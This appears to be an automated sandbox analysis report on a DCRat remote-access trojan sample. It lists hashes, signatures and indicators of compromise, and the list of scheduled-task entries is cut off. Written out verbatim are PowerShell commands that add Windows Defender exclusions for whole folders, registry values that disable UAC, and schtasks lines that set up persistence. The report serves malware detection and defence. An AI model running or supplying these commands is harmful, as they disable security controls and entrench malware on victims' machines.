dcrat | 6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4

Analysis

max time kernel
146s
max time network
43s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
17/10/2022, 05:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
Size

4.9MB
MD5

3853eeaac891a4cefed467a48599ed56
SHA1

83611ff9b18910db848187cbddf9c907c044c6f1
SHA256

6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4
SHA512

7f3f785358671ef8934c5b4376ddab04c54758b78938505a8b6826bcb595422755f45c826af4aff06e0273a2e4f4ecb8363843498a9cb102940e5b9c09802654
SSDEEP

49152:rl5MTGChZpxtlBBgxchXb/zqP6DUtRgs5q289dAnSz44hnW1XgnYu6fYmPkMSx8E:

Score

10^/10

dcrat evasion infostealer rat trojan

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 42 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	588	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1708	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1720	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2028	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1924	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1092	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	900	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1168	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1320	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1736	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1248	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	828	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1676	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1480	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	532	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	860	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1212	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1692	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1120	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	624	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1324	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1796	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	956	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	952	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1672	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	632	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	924	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1608	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1648	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1000	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1996	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	240	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1972	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2028	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1768	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	932	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1160	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1008	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1284	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	604	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1088	992	schtasks.exe	26
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1804	992	schtasks.exe	26

UAC bypass 3 TTPs 6 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/memory/1504-55-0x000000001B980000-0x000000001BAAE000-memory.dmp	dcrat

Executes dropped EXE 1 IoCs

pid	Process
1460	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe

Drops file in Program Files directory 16 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\RCX6819.tmp	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
File opened for modification	C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\RCXCCD0.tmp	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
File opened for modification	C:\Program Files\Uninstall Information\6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
File created	C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\886983d96e3d3e	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
File opened for modification	C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\csrss.exe	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
File opened for modification	C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\csrss.exe	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
File created	C:\Program Files\Uninstall Information\6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
File created	C:\Program Files\Uninstall Information\93b0cb30cd0bdd	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
File created	C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\6203df4a6bafc7	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
File created	C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\csrss.exe	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
File opened for modification	C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\RCXA2CF.tmp	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
File created	C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\lsass.exe	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
File created	C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\886983d96e3d3e	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
File created	C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Documentation\1033\csrss.exe	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
File opened for modification	C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\lsass.exe	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
File opened for modification	C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\RCXAB38.tmp	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\tracing\csrss.exe	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
File created	C:\Windows\tracing\886983d96e3d3e	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
File opened for modification	C:\Windows\tracing\RCXB3A2.tmp	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
File opened for modification	C:\Windows\tracing\csrss.exe	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 42 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
924	schtasks.exe
932	schtasks.exe
1008	schtasks.exe
1320	schtasks.exe
1480	schtasks.exe
624	schtasks.exe
1720	schtasks.exe
1212	schtasks.exe
956	schtasks.exe
1168	schtasks.exe
1284	schtasks.exe
1000	schtasks.exe
240	schtasks.exe
1972	schtasks.exe
1088	schtasks.exe
1804	schtasks.exe
1248	schtasks.exe
1676	schtasks.exe
1672	schtasks.exe
2028	schtasks.exe
1160	schtasks.exe
900	schtasks.exe
1324	schtasks.exe
1996	schtasks.exe
632	schtasks.exe
1648	schtasks.exe
1768	schtasks.exe
2028	schtasks.exe
1924	schtasks.exe
1120	schtasks.exe
828	schtasks.exe
860	schtasks.exe
588	schtasks.exe
1092	schtasks.exe
1736	schtasks.exe
1796	schtasks.exe
952	schtasks.exe
1608	schtasks.exe
604	schtasks.exe
1708	schtasks.exe
532	schtasks.exe
1692	schtasks.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
1460	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
Token: SeDebugPrivilege	1460	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe

Suspicious use of WriteProcessMemory 45 IoCs

description	pid	Process	procid_target
PID 1504 wrote to memory of 900	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	69
PID 1504 wrote to memory of 900	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	69
PID 1504 wrote to memory of 900	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	69
PID 1504 wrote to memory of 1180	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	70
PID 1504 wrote to memory of 1180	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	70
PID 1504 wrote to memory of 1180	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	70
PID 1504 wrote to memory of 1660	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	71
PID 1504 wrote to memory of 1660	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	71
PID 1504 wrote to memory of 1660	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	71
PID 1504 wrote to memory of 1592	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	73
PID 1504 wrote to memory of 1592	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	73
PID 1504 wrote to memory of 1592	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	73
PID 1504 wrote to memory of 1756	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	74
PID 1504 wrote to memory of 1756	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	74
PID 1504 wrote to memory of 1756	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	74
PID 1504 wrote to memory of 2012	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	76
PID 1504 wrote to memory of 2012	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	76
PID 1504 wrote to memory of 2012	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	76
PID 1504 wrote to memory of 924	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	79
PID 1504 wrote to memory of 924	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	79
PID 1504 wrote to memory of 924	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	79
PID 1504 wrote to memory of 1784	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	81
PID 1504 wrote to memory of 1784	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	81
PID 1504 wrote to memory of 1784	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	81
PID 1504 wrote to memory of 1320	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	83
PID 1504 wrote to memory of 1320	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	83
PID 1504 wrote to memory of 1320	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	83
PID 1504 wrote to memory of 1936	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	85
PID 1504 wrote to memory of 1936	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	85
PID 1504 wrote to memory of 1936	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	85
PID 1504 wrote to memory of 632	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	87
PID 1504 wrote to memory of 632	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	87
PID 1504 wrote to memory of 632	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	87
PID 1504 wrote to memory of 1752	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	89
PID 1504 wrote to memory of 1752	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	89
PID 1504 wrote to memory of 1752	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	89
PID 1504 wrote to memory of 1764	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	93
PID 1504 wrote to memory of 1764	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	93
PID 1504 wrote to memory of 1764	1504	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe	93
PID 1764 wrote to memory of 360	1764	cmd.exe	95
PID 1764 wrote to memory of 360	1764	cmd.exe	95
PID 1764 wrote to memory of 360	1764	cmd.exe	95
PID 1764 wrote to memory of 1460	1764	cmd.exe	96
PID 1764 wrote to memory of 1460	1764	cmd.exe	96
PID 1764 wrote to memory of 1460	1764	cmd.exe	96

System policy modification 1 TTPs 6 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe

C:\Users\Admin\AppData\Local\Temp\6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
"C:\Users\Admin\AppData\Local\Temp\6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe"
1⤵
- UAC bypass
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1504
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
  2⤵
  PID:900
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
  2⤵
  PID:1180
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
  2⤵
  PID:1660
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
  2⤵
  PID:1592
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
  2⤵
  PID:1756
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
  2⤵
  PID:2012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
  2⤵
  PID:924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
  2⤵
  PID:1784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
  2⤵
  PID:1320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
  2⤵
  PID:1936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
  2⤵
  PID:632
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
  2⤵
  PID:1752
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nGqzZBedkm.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1764
- - C:\Windows\system32\w32tm.exe
    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
    3⤵
    PID:360
- - C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe
    "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe"
    3⤵
    - UAC bypass
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - System policy modification
    PID:1460
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b5f12669-9f63-4fca-aa69-b4b88a81e0a6.vbs"
      4⤵
      PID:532
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d997f087-4381-4261-b74c-17a5014b4a47.vbs"
      4⤵
      PID:556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef46" /sc MINUTE /mo 9 /tr "'C:\Program Files\Uninstall Information\6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:588

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1708

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef46" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Favorites\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\Default\Favorites\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Favorites\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 7 /tr "'C:\Recovery\d6223342-1a8a-11ed-b209-a59dca5554ed\lsm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:900

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Recovery\d6223342-1a8a-11ed-b209-a59dca5554ed\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1168

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 7 /tr "'C:\Recovery\d6223342-1a8a-11ed-b209-a59dca5554ed\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1320

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef46" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1736

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1248

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef46" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\6bdcafe45540c9492882c077ad121ff6abc704eb2e547aa776de18da65a51ef4.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\lsm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1676

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1480

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Recovery\d6223342-1a8a-11ed-b209-a59dca5554ed\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:860

C:\Windows\system32\schtasks.exe
